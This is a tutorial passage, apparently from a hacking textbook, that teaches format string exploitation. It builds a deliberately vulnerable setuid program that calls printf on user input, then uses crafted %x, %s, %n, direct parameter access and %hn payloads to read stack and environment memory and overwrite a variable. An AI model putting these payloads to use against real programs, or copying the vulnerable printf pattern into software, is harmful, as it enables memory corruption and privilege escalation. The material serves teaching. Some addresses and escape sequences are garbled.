A format string exploit is another technique you can use to gain control of a privileged program. Like buffer overflow exploits, format string exploits also depend on programming mistakes that may not appear to have an obvious impact on security. Luckily for programmers, once the technique is known, it's fairly easy to spot format string vulnerabilities and eliminate them. Although format string vulnerabilities aren't very common anymore, the following techniques can also be used in other situations.
You should be fairly familiar with basic format strings by now. They have been used extensively with functions like printf()
in previous programs. A function that uses format strings, such as printf()
, simply evaluates the format string passed to it and performs a special action each time a format parameter is encountered. Each format parameter expects an additional variable to be passed, so if there are three format parameters in a format string, there should be three more arguments to the function (in addition to the format string argument).
Recall the various format parameters explained in the previous chapter.
Parameter | Input Type | Output Type |
---|---|---|
| Value | Decimal |
| Value | Unsigned decimal |
| Value | Hexadecimal |
| Pointer | String |
| Pointer | Number of bytes written so far |
The previous chapter demonstrated the use of the more common format parameters, but neglected the less common %n
format parameter. The fmt_uncommon.c code demonstrates its use.
#include <stdio.h> #include <stdlib.h> int main() { int A = 5, B = 7, count_one, count_two; // Example of a %n format string printf("The number of bytes written up to this point X%n is being stored in count_one, and the number of bytes up to here X%n is being stored in count_two.\n", &count_one, &count_two); printf("count_one: %d\n", count_one); printf("count_two: %d\n", count_two); // Stack example printf("A is %d and is at %08x. B is %x.\n", A, &A, B); exit(0); }
This program uses two %n
format parameters in its printf()
statement. The following is the output of the program's compilation and execution.
reader@hacking:~/booksrc $ gcc fmt_uncommon.c reader@hacking:~/booksrc $ ./a.out The number of bytes written up to this point X is being stored in count_one, and the number of bytes up to here X is being stored in count_two. count_one: 46 count_two: 113 A is 5 and is at bffff7f4. B is 7. reader@hacking:~/booksrc $
The %n
format parameter is unique in that it writes data without displaying anything, as opposed to reading and then displaying data. When a format function encounters a %n
format parameter, it writes the number of bytes that have been written by the function to the address in the corresponding function argument. In fmt_uncommon
, this is done in two places, and the unary address operator is used to write this data into the variables count_one
and count_two
, respectively. The values are then outputted, revealing that 46 bytes are found before the first %n
and 113 before the second.
The stack example at the end is a convenient segue into an explanation of the stack's role with format strings:
printf("A is %d and is at %08x. B is %x.\n", A, &A, B);
When this printf()
function is called (as with any function), the arguments are pushed to the stack in reverse order. First the value of B
, then the address of A
, then the value of A
, and finally the address of the format string.
The stack will look like the diagram here.
The format function iterates through the format string one character at a time. If the character isn't the beginning of a format parameter (which is designated by the percent sign), the character is copied to the output. If a format parameter is encountered, the appropriate action is taken, using the argument in the stack corresponding to that parameter.
But what if only two arguments are pushed to the stack with a format string that uses three format parameters? Try removing the last argument from the printf()
line for the stack example so it matches the line shown below.
printf("A is %d and is at %08x. B is %x.\n", A, &A);
This can be done in an editor or with a little bit of sed
magic.
reader@hacking:~/booksrc $ sed -e 's/, B)/)/' fmt_uncommon.c > fmt_uncommon2.c reader@hacking:~/booksrc $ diff fmt_uncommon.c fmt_uncommon2.c 14c14 < printf("A is %d and is at %08x. B is %x.\n", A, &A, B); --- > printf("A is %d and is at %08x. B is %x.\n", A, &A); reader@hacking:~/booksrc $ gcc fmt_uncommon2.c reader@hacking:~/booksrc $ ./a.out The number of bytes written up to this point X is being stored in count_one, and the number of bytes up to here X is being stored in count_two. count_one: 46 count_two: 113 A is 5 and is at bffffc24. B is b7fd6ff4. reader@hacking:~/booksrc $
The result is b7fd6ff4
. What the hell is b7fd6ff4
? It turns out that since there wasn't a value pushed to the stack, the format function just pulled data from where the third argument should have been (by adding to the current frame pointer). This means 0xb7fd6ff4
is the first value found below the stack frame for the format function.
This is an interesting detail that should be remembered. It certainly would be a lot more useful if there were a way to control either the number of arguments passed to or expected by a format function. Luckily, there is a fairly common programming mistake that allows for the latter.
Sometimes programmers use printf(string)
instead of printf("%s", string)
to print strings. Functionally, this works fine. The format function is passed the address of the string, as opposed to the address of a format string, and it iterates through the string, printing each character. Examples of both methods are shown in fmt_vuln.c.
#include <stdio.h> #include <stdlib.h> #include <string.h> int main(int argc, char *argv[]) { char text[1024]; static int test_val = -72; if(argc < 2) { printf("Usage: %s <text to print>\n", argv[0]); exit(0); } strcpy(text, argv[1]); printf("The right way to print user-controlled input:\n"); printf("%s", text); printf("\nThe wrong way to print user-controlled input:\n"); printf(text); printf("\n"); // Debug output printf("[*] test_val @ 0x%08x = %d 0x%08x\n", &test_val, test_val, test_val); exit(0); }
The following output shows the compilation and execution of fmt_vuln.c.
reader@hacking:~/booksrc $ gcc -o fmt_vuln fmt_vuln.c reader@hacking:~/booksrc $ sudo chown root:root ./fmt_vuln reader@hacking:~/booksrc $ sudo chmod u+s ./fmt_vuln reader@hacking:~/booksrc $ ./fmt_vuln testing The right way to print user-controlled input: testing The wrong way to print user-controlled input: testing [*] test_val @ 0x08049794 = -72 0xffffffb8 reader@hacking:~/booksrc $
Both methods seem to work with the string testing. But what happens if the string contains a format parameter? The format function should try to evaluate the format parameter and access the appropriate function argument by adding to the frame pointer. But as we saw earlier, if the appropriate function argument isn't there, adding to the frame pointer will reference a piece of memory in a preceding stack frame.
reader@hacking:~/booksrc $ ./fmt_vuln testing %x The right way to print user-controlled input: testing%x The wrong way to print user-controlled input: testingbffff3e0 [*] test_val @ 0x08049794 = -72 0xffffffb8 reader@hacking:~/booksrc $
When the %x
format parameter was used, the hexadecimal representation of a four-byte word in the stack was printed. This process can be used repeatedly to examine stack memory.
reader@hacking:~/booksrc $ ./fmt_vuln $(perl -e 'print "%08x."x40') The right way to print user-controlled input: %08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x .%08x. %08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x .%08x. %08x.%08x. The wrong way to print user-controlled input: bffff320.b7fe75fc.00000000.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e .30252 e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e .30252e78.2 52e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78 .252e78 38.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e. [*] test_val @ 0x08049794 = -72 0xffffffb8 reader@hacking:~/booksrc $
This is what the lower stack memory looks like. Remember that each four-byte word is backward, due to the little-endian architecture. The bytes 0x25, 0x30, 0x38, 0x78
, and 0x2e
seem to be repeating a lot. Wonder what those bytes are?
reader@hacking:~/booksrc $ printf "\x25\x30\x38\x78\x2e\n" %08x. reader@hacking:~/booksrc $
As you can see, they're the memory for the format string itself. Because the format function will always be on the highest stack frame, as long as the format string has been stored anywhere on the stack, it will be located below the current frame pointer (at a higher memory address). This fact can be used to control arguments to the format function. It is particularly useful if format parameters that pass by reference are used, such as %s
or %n
.
The %s
format parameter can be used to read from arbitrary memory addresses. Since it's possible to read the data of the original format string, part of the original format string can be used to supply an address to the %s
format parameter, as shown here:
reader@hacking:~/booksrc $ ./fmt_vuln AAAA%08x.%08x.%08x.%08x The right way to print user-controlled input: AAAA%08x.%08x.%08x.%08x The wrong way to print user-controlled input: AAAAbffff3d0.b7fe75fc.00000000.41414141 [*] test_val @ 0x08049794 = -72 0xffffffb8 reader@hacking:~/booksrc $
The four bytes of 0x41
indicate that the fourth format parameter is reading from the beginning of the format string to get its data. If the fourth format parameter is %s
instead of %x
, the format function will attempt to print the string located at 0x41414141
. This will cause the program to crash in a segmentation fault, since this isn't a valid address. But if a valid memory address is used, this process could be used to read a string found at that memory address.
reader@hacking:~/booksrc $ env | grep PATH PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games reader@hacking:~/booksrc $ ./getenvaddr PATH ./fmt_vuln PATH will be at 0xbffffdd7 reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\xd7\xfd\xff\xbf")%08x.%08x.%08x.%s The right way to print user-controlled input: ????%08x.%08x.%08x.%s The wrong way to print user-controlled input: ????bffff3d0.b7fe75fc.00000000./usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin: /bin:/ usr/games [*] test_val @ 0x08049794 = -72 0xffffffb8 reader@hacking:~/booksrc $
Here the getenvaddr
program is used to get the address for the environment variable PATH
. Since the program name fmt_vuln is two bytes less than getenvaddr, four is added to the address, and the bytes are reversed due to the byte ordering. The fourth format parameter of %s
reads from the beginning of the format string, thinking it's the address that was passed as a function argument. Since this address is the address of the PATH
environment variable, it is printed as if a pointer to the environment variable were passed to printf()
.
Now that the distance between the end of the stack frame and the beginning of the format string memory is known, the field-width arguments can be omitted in the %x
format parameters. These format parameters are only needed to step through memory. Using this technique, any memory address can be examined as a string.
If the %s
format parameter can be used to read an arbitrary memory address, you should be able to use the same technique with %n
to write to an arbitrary memory address. Now things are getting interesting.
The test_val
variable has been printing its address and value in the debug statement of the vulnerable fmt_vuln.c program, just begging to be overwritten. The test variable is located at 0x08049794
, so by using a similar technique, you should be able to write to the variable.
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\xd7\xfd\xff\xbf")%08x.%08x.%08x.%s The right way to print user-controlled input: ????%08x.%08x.%08x.%s The wrong way to print user-controlled input: ????bffff3d0.b7fe75fc.00000000./usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin: /bin:/ usr/games [*] test_val @ 0x08049794 = -72 0xffffffb8 reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%08x.%08x.%08x.%n The right way to print user-controlled input: ??%08x.%08x.%08x.%n The wrong way to print user-controlled input: ??bffff3d0.b7fe75fc.00000000. [*] test_val @ 0x08049794 = 31 0x0000001f reader@hacking:~/booksrc $
As this shows, the test_val
variable can indeed be overwritten using the %n
format parameter. The resulting value in the test variable depends on the number of bytes written before the %n
. This can be controlled to a greater degree by manipulating the field width option.
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%x%n The right way to print user-controlled input: ??%x%x%x%n The wrong way to print user-controlled input: ??bffff3d0b7fe75fc0 [*] test_val @ 0x08049794 = 21 0x00000015 reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%100x%n The right way to print user-controlled input: ??%x%x%100x%n The wrong way to print user-controlled input: ??bffff3d0b7fe75fc 0 [*] test_val @ 0x08049794 = 120 0x00000078 reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%180x%n The right way to print user-controlled input: ??%x%x%180x%n The wrong way to print user-controlled input: ??bffff3d0b7fe75fc 0 [*] test_val @ 0x08049794 = 200 0x000000c8 reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%400x%n The right way to print user-controlled input: ??%x%x%400x%n The wrong way to print user-controlled input: ??bffff3d0b7fe75fc 0 [*] test_val @ 0x08049794 = 420 0x000001a4 reader@hacking:~/booksrc $
By manipulating the field-width option of one of the format parameters before the %n
, a certain number of blank spaces can be inserted, resulting in the output having some blank lines. These lines, in turn, can be used to control the number of bytes written before the %n
format parameter. This approach will work for small numbers, but it won't work for larger ones, like memory addresses.
Looking at the hexadecimal representation of the test_val
value, it's apparent that the least significant byte can be controlled fairly well. (Remember that the least significant byte is actually located in the first byte of the fourbyte word of memory.) This detail can be used to write an entire address. If four writes are done at sequential memory addresses, the least significant byte can be written to each byte of a four-byte word, as shown here:
Memory 94 95 96 97
First write to 0x08049794 AA 00 00 00 Second write to 0x08049795 BB 00 00 00 Third write to 0x08049796 CC 00 00 00 Fourth write to 0x08049797 DD 00 00 00Result AA BB CC DD
As an example, let's try to write the address 0xDDCCBBAA
into the test variable. In memory, the first byte of the test variable should be 0xAA
, then 0xBB
, then 0xCC
, and finally 0xDD
. Four separate writes to the memory addresses 0x08049794, 0x08049795, 0x08049796
, and 0x08049797
should accomplish this. The first write will write the value 0x000000aa
, the second 0x000000bb
, the third 0x000000cc
, and finally 0x000000dd
.
The first write should be easy.
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%8x%n The right way to print user-controlled input: ??%x%x%8x%n The wrong way to print user-controlled input: ??bffff3d0b7fe75fc 0 [*] test_val @ 0x08049794 = 28 0x0000001c reader@hacking:~/booksrc $ gdb -q (gdb) p 0xaa - 28 + 8 $1 = 150 (gdb) quit reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%150x%n The right way to print user-controlled input: ??%x%x%150x%n The wrong way to print user-controlled input: ??bffff3d0b7fe75fc 0 [*] test_val @ 0x08049794 = 170 0x000000aa reader@hacking:~/booksrc $
The last %x
format parameter uses 8 as the field width to standardize the output. This is essentially reading a random DWORD from the stack, which could output anywhere from 1 to 8 characters. Since the first overwrite puts 28 into test_val, using 150 as the field width instead of 8 should control the least significant byte of test_val
to 0xAA
.
Now for the next write. Another argument is needed for another %x
format parameter to increment the byte count to 187, which is 0xBB in decimal. This argument could be anything; it just has to be four bytes long and must be located after the first arbitrary memory address of 0x08049754
. Since this is all still in the memory of the format string, it can be easily controlled. The word JUNK is four bytes long and will work fine.
After that, the next memory address to be written to, 0x08049755
, should be put into memory so the second %n
format parameter can access it. This means the beginning of the format string should consist of the target memory address, four bytes of junk, and then the target memory address plus one. But all of these bytes of memory are also printed by the format function, thus incrementing the byte counter used for the %n
format parameter. This is getting tricky.
Perhaps we should think about the beginning of the format string ahead of time. The goal is to have four writes. Each one will need to have a memory address passed to it, and among them all, four bytes of junk are needed to properly increment the byte counter for the %n
format parameters. The first %x
format parameter can use the four bytes found before the format string itself, but the remaining three will need to be supplied data. For the entire write procedure, the beginning of the format string should look like this:
Let's give it a try.
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\ x96\ x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%8x%n The right way to print user-controlled input: ??JUNK??JUNK??JUNK??%x%x%8x%n The wrong way to print user-controlled input: ??JUNK??JUNK??JUNK??bffff3c0b7fe75fc 0 [*] test_val @ 0x08049794 = 52 0x00000034 reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xaa - 52 + 8" $1 = 126 reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\ x96\ x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%126x%n The right way to print user-controlled input: ??JUNK??JUNK??JUNK??%x%x%126x%n The wrong way to print user-controlled input: ??JUNK??JUNK??JUNK??bffff3c0b7fe75fc 0 [*] test_val @ 0x08049794 = 170 0x000000aa reader@hacking:~/booksrc $
The addresses and junk data at the beginning of the format string changed the value of the necessary field width option for the %x
format parameter. However, this is easily recalculated using the same method as before. Another way this could have been done is to subtract 24 from the previous field width value of 150, since 6 new 4-byte words have been added to the front of the format string.
Now that all the memory is set up ahead of time in the beginning of the format string, the second write should be simple.
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xbb - 0xaa" $1 = 17 reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\ x96\ x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%126x%n%17x%n The right way to print user-controlled input: ??JUNK??JUNK??JUNK??%x%x%126x%n%17x%n The wrong way to print user-controlled input: ??JUNK??JUNK??JUNK??bffff3b0b7fe75fc 0 4b4e554a [*] test_val @ 0x08049794 = 48042 0x0000bbaa reader@hacking:~/booksrc $
The next desired value for the least significant byte is 0xBB
. A hexadecimal calculator quickly shows that 17 more bytes need to be written before the next %n
format parameter. Since memory has already been set up for a %x
format parameter, it's simple to write 17 bytes using the field width option.
This process can be repeated for the third and fourth writes.
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xcc - 0xbb" $1 = 17 reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xdd - 0xcc" $1 = 17 reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\ x96\ x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%126x%n%17x%n%17x%n%17x%n The right way to print user-controlled input: ??JUNK??JUNK??JUNK??%x%x%126x%n%17x%n%17x%n%17x%n The wrong way to print user-controlled input: ??JUNK??JUNK??JUNK??bffff3b0b7fe75fc 0 4b4e554a 4b4e554a 4b4e554a [*] test_val @ 0x08049794 = -573785174 0xddccbbaa reader@hacking:~/booksrc $
By controlling the least significant byte and performing four writes, an entire address can be written to any memory address. It should be noted that the three bytes found after the target address will also be overwritten using this technique. This can be quickly explored by statically declaring another initialized variable called next_val
, right after test_val
, and also displaying this value in the debug output. The changes can be made in an editor or with some more sed
magic.
Here, next_val
is initialized with the value 0x11111111
, so the effect of the write operations on it will be apparent.
reader@hacking:~/booksrc $ sed -e 's/72;/72, next_val = 0x11111111;/;/@/{h;s/test/next/ g;x;G}' fmt_vuln.c > fmt_vuln2.c reader@hacking:~/booksrc $ diff fmt_vuln.c fmt_vuln2.c 7c7 < static int test_val = -72; --- > static int test_val = -72, next_val = 0x11111111; 27a28 > printf("[*] next_val @ 0x%08x = %d 0x%08x\n", &next_val, next_val, next_val); reader@hacking:~/booksrc $ gcc -o fmt_vuln2 fmt_vuln2.c reader@hacking:~/booksrc $ ./fmt_vuln2 test The right way: test The wrong way: test [*] test_val @ 0x080497b4 = -72 0xffffffb8 [*] next_val @ 0x080497b8 = 286331153 0x11111111 reader@hacking:~/booksrc $
As the preceding output shows, the code change has also moved the address of the test_val
variable. However, next_val
is shown to be adjacent to it. For practice, let's write an address into the variable test_val
again, using the new address.
Last time, a very convenient address of oxdccbbaa
was used. Since each byte is greater than the previous byte, it's easy to increment the byte counter for each byte. But what if an address like 0x0806abcd
is used? With this address, the first byte of 0xCD
is easy to write using the %n
format parameter by outputting 205 bytes total bytes with a field width of 161. But then the next byte to be written is 0xAB
, which would need to have 171 bytes outputted. It's easy to increment the byte counter for the %n
format parameter, but it's impossible to subtract from it.
reader@hacking:~/booksrc $ ./fmt_vuln2 AAAA%x%x%x%x The right way to print user-controlled input: AAAA%x%x%x%x The wrong way to print user-controlled input: AAAAbffff3d0b7fe75fc041414141 [*] test_val @ 0x080497f4 = -72 0xffffffb8 [*] next_val @ 0x080497f8 = 286331153 0x11111111 reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xcd - 5" $1 = 200 reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\ xf6\ x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%8x%n The right way to print user-controlled input: ??JUNK??JUNK??JUNK??%x%x%8x%n The wrong way to print user-controlled input: ??JUNK??JUNK??JUNK??bffff3c0b7fe75fc 0 [*] test_val @ 0x08049794 = -72 0xffffffb8 reader@hacking:~/booksrc $ reader@hacking:~/booksrc $ ./fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\ xf6\ x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%8x%n The right way to print user-controlled input: ??JUNK??JUNK??JUNK??%x%x%8x%n The wrong way to print user-controlled input: ??JUNK??JUNK??JUNK??bffff3c0b7fe75fc 0 [*] test_val @ 0x080497f4 = 52 0x00000034 [*] next_val @ 0x080497f8 = 286331153 0x11111111 reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xcd - 52 + 8" $1 = 161 reader@hacking:~/booksrc $ ./fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\ xf6\ x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n The right way to print user-controlled input: ??JUNK??JUNK??JUNK??%x%x%161x%n The wrong way to print user-controlled input: ??JUNK??JUNK??JUNK??bffff3b0b7fe75fc 0 [*] test_val @ 0x080497f4 = 205 0x000000cd [*] next_val @ 0x080497f8 = 286331153 0x11111111 reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xab - 0xcd" $1 = -34 reader@hacking:~/booksrc $
Instead of trying to subtract 34 from 205, the least significant byte is just wrapped around to 0x1AB
by adding 222 to 205 to produce 427, which is the decimal representation of 0x1AB
. This technique can be used to wrap around again and set the least significant byte to 0x06
for the third write.
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0x1ab - 0xcd" $1 = 222 reader@hacking:~/booksrc $ gdb -q --batch -ex "p /d 0x1ab" $1 = 427 reader@hacking:~/booksrc $ ./fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\ xf6\ x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n%222x%n The right way to print user-controlled input: ??JUNK??JUNK??JUNK??%x%x%161x%n%222x%n The wrong way to print user-controlled input: ??JUNK??JUNK??JUNK??bffff3b0b7fe75fc 0 4b4e554a [*] test_val @ 0x080497f4 = 109517 0x0001abcd [*] next_val @ 0x080497f8 = 286331136 0x11111100 reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0x06 - 0xab" $1 = -165 reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0x106 - 0xab" $1 = 91 reader@hacking:~/booksrc $ ./fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\ xf6\ x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n%222x%n%91x%n The right way to print user-controlled input: ??JUNK??JUNK??JUNK??%x%x%161x%n%222x%n%91x%n The wrong way to print user-controlled input: ??JUNK??JUNK??JUNK??bffff3b0b7fe75fc 0 4b4e554a 4b4e554a [*] test_val @ 0x080497f4 = 33991629 0x0206abcd [*] next_val @ 0x080497f8 = 286326784 0x11110000 reader@hacking:~/booksrc $
With each write, bytes of the next_val
variable, adjacent to test_val
, are being overwritten. The wraparound technique seems to be working fine, but a slight problem manifests itself as the final byte is attempted.
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0x08 - 0x06" $1 = 2 reader@hacking:~/booksrc $ ./fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\ xf6\ x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n%222x%n%91x%n%2x%n The right way to print user-controlled input: ??JUNK??JUNK??JUNK??%x%x%161x%n%222x%n%91x%n%2x%n The wrong way to print user-controlled input: ??JUNK??JUNK??JUNK??bffff3a0b7fe75fc 0 4b4e554a 4b4e554a4b4e554a [*] test_val @ 0x080497f4 = 235318221 0x0e06abcd [*] next_val @ 0x080497f8 = 285212674 0x11000002 reader@hacking:~/booksrc $
What happened here? The difference between 0x06
and 0x08
is only two, but eight bytes are output, resulting in the byte 0x0e
being written by the %n
format parameter, instead. This is because the field width option for the %x
format parameter is only a minimum field width, and eight bytes of data were output. This problem can be alleviated by simply wrapping around again; however, it's good to know the limitations of the field width option.
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0x108 - 0x06" $1 = 258 reader@hacking:~/booksrc $ ./fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\ xf6\ x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n%222x%n%91x%n%258x%n The right way to print user-controlled input: ??JUNK??JUNK??JUNK??%x%x%161x%n%222x%n%91x%n%258x%n The wrong way to print user-controlled input: ??JUNK??JUNK??JUNK??bffff3a0b7fe75fc 0 4b4e554a 4b4e554a 4b4e554a [*] test_val @ 0x080497f4 = 134654925 0x0806abcd [*] next_val @ 0x080497f8 = 285212675 0x11000003 reader@hacking:~/booksrc $
Just like before, the appropriate addresses and junk data are put in the beginning of the format string, and the least significant byte is controlled for four write operations to overwrite all four bytes of the variable test_val
. Any value subtractions to the least significant byte can be accomplished by wrapping the byte around. Also, any additions less than eight may need to be wrapped around in a similar fashion.
Direct parameter access is a way to simplify format string exploits. In the previous exploits, each of the format parameter arguments had to be stepped through sequentially. This necessitated using several %x
format parameters to step through parameter arguments until the beginning of the format string was reached. In addition, the sequential nature required three 4-byte words of junk to properly write a full address to an arbitrary memory location.
As the name would imply, direct parameter access allows parameters to be accessed directly by using the dollar sign qualifier. For example, %n
$d
would access the nth parameter and display it as a decimal number.
printf("7th: %7$d, 4th: %4$05d \n", 10, 20, 30, 40, 50, 60, 70, 80);
The preceding printf()
call would have the following output:
7th: 70, 4th: 00040
First, the 70 is outputted as a decimal number when the format parameter of %7$d
is encountered, because the seventh parameter is 70. The second format parameter accesses the fourth parameter and uses a field width option of 05
. All of the other parameter arguments are untouched. This method of direct access eliminates the need to step through memory until the beginning of the format string is located, since this memory can be accessed directly. The following output shows the use of direct parameter access.
reader@hacking:~/booksrc $ ./fmt_vuln AAAA%x%x%x%x The right way to print user-controlled input: AAAA%x%x%x%x The wrong way to print user-controlled input: AAAAbffff3d0b7fe75fc041414141 [*] test_val @ 0x08049794 = -72 0xffffffb8 reader@hacking:~/booksrc $ ./fmt_vuln AAAA%4\$x The right way to print user-controlled input: AAAA%4$x The wrong way to print user-controlled input: AAAA41414141 [*] test_val @ 0x08049794 = -72 0xffffffb8 reader@hacking:~/booksrc $
In this example, the beginning of the format string is located at the fourth parameter argument. Instead of stepping through the first three parameter arguments using %x
format parameters, this memory can be accessed directly. Since this is being done on the command line and the dollar sign is a special character, it must be escaped with a backslash. This just tells the command shell to avoid trying to interpret the dollar sign as a special character. The actual format string can be seen when it is printed correctly.
Direct parameter access also simplifies the writing of memory addresses. Since memory can be accessed directly, there's no need for four-byte spacers of junk data to increment the byte output count. Each of the %x
format parameters that usually performs this function can just directly access a piece of memory found before the format string. For practice, let's use direct parameter access to write a more realistic-looking address of 0xbffffd72
into the variable test_val
s.
reader@hacking:~/booksrc $ ./fmt_vuln $(perl -e 'print "\x94\x97\x04\x08" . "\x95\x97\x04\ x08" . "\x96\x97\x04\x08" . "\x97\x97\x04\x08"')%4\$n The right way to print user-controlled input: ????????%4$n The wrong way to print user-controlled input: ???????? [*] test_val @ 0x08049794 = 16 0x00000010 reader@hacking:~/booksrc $ gdb -q (gdb) p 0x72 - 16$1 = 98
(gdb) p 0xfd - 0x72$2 = 139
(gdb) p 0xff - 0xfd $3 = 2 (gdb) p 0x1ff - 0xfd$4 = 258
(gdb) p 0xbf - 0xff $5 = -64 (gdb) p 0x1bf - 0xff$6 = 192
(gdb) quit reader@hacking:~/booksrc $ ./fmt_vuln $(perl -e 'print "\x94\x97\x04\x08" . "\x95\x97\x04\ x08" . "\x96\x97\x04\x08" . "\x97\x97\x04\x08"')%98x%4\$n%139x%5\$n The right way to print user-controlled input: ????????%98x%4$n%139x%5$n The wrong way to print user-controlled input: ???????? bffff3c0 b7fe75fc [*] test_val @ 0x08049794 = 64882 0x0000fd72 reader@hacking:~/booksrc $ ./fmt_vuln $(perl -e 'print "\x94\x97\x04\x08" . "\x95\x97\x04\ x08" . "\x96\x97\x04\x08" . "\x97\x97\x04\x08"')%98x%4\$n%139x%5\$n%258x%6\$n%192x%7\$n The right way to print user-controlled input: ????????%98x%4$n%139x%5$n%258x%6$n%192x%7$n The wrong way to print user-controlled input: ???????? bffff3b0 b7fe75fc 0 8049794 [*] test_val @ 0x08049794 = -1073742478 0xbffffd72 reader@hacking:~/booksrc $
Since the stack doesn't need to be printed to reach our addresses, the number of bytes written at the first format parameter is 16. Direct parameter access is only used for the %n
parameters, since it really doesn't matter what values are used for the %x
spacers. This method simplifies the process of writing an address and shrinks the mandatory size of the format string.
Another technique that can simplify format string exploits is using short writes. A short is typically a two-byte word, and format parameters have a special way of dealing with them. A more complete description of possible format parameters can be found in the printf manual page. The portion describing the length modifier is shown in the output below.
The length modifier Here, integer conversion stands for d, i, o, u, x, or X conversion. h A following integer conversion corresponds to a short int or unsigned short int argument, or a following n conversion corresponds to a pointer to a short int argument.
This can be used with format string exploits to write two-byte shorts. In the output below, a short (shown in bold) is written in at both ends of the four-byte test_val
variable. Naturally, direct parameter access can still be used.
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%x%hn The right way to print user-controlled input: ??%x%x%x%hn The wrong way to print user-controlled input: ??bffff3d0b7fe75fc0 [*] test_val @ 0x08049794 = -65515 0xffff 0015 reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x96\x97\x04\x08")%x%x%x%hn The right way to print user-controlled input: ??%x%x%x%hn The wrong way to print user-controlled input: ??bffff3d0b7fe75fc0 [*] test_val @ 0x08049794 = 1441720 0x0015ffb8 reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x96\x97\x04\x08")%4\$hn The right way to print user-controlled input: ??%4$hn The wrong way to print user-controlled input: ?? [*] test_val @ 0x08049794 = 327608 0x0004ffb8 reader@hacking:~/booksrc $
Using short writes, an entire four-byte value can be overwritten with just two %hn
parameters. In the example below, the test_val
variable will be overwritten once again with the address 0xbffffd72
.
reader@hacking:~/booksrc $ gdb -q (gdb) p 0xfd72 - 8 $1 = 64874 (gdb) p 0xbfff - 0xfd72 $2 = -15731 (gdb) p 0x1bfff - 0xfd72 $3 = 49805 (gdb) quit reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08\x96\x97\x04\x08") %64874x%4\ $hn%49805x%5\$hn The right way to print user-controlled input: ????%64874x%4$hn%49805x%5$hn The wrong way to print user-controlled input: b7fe75fc [*] test_val @ 0x08049794 = -1073742478 0xbffffd72 reader@hacking:~/booksrc $
The preceding example used a similar wraparound method to deal with the second write of 0xbfff
being less than the first write of 0xfd72
. Using short writes, the order of the writes doesn't matter, so the first write can be 0xfd72
and the second 0xbfff
, if the two passed addresses are swapped in position. In the output below, the address 0x08049796
is written to first, and 0x08049794
is written to second.
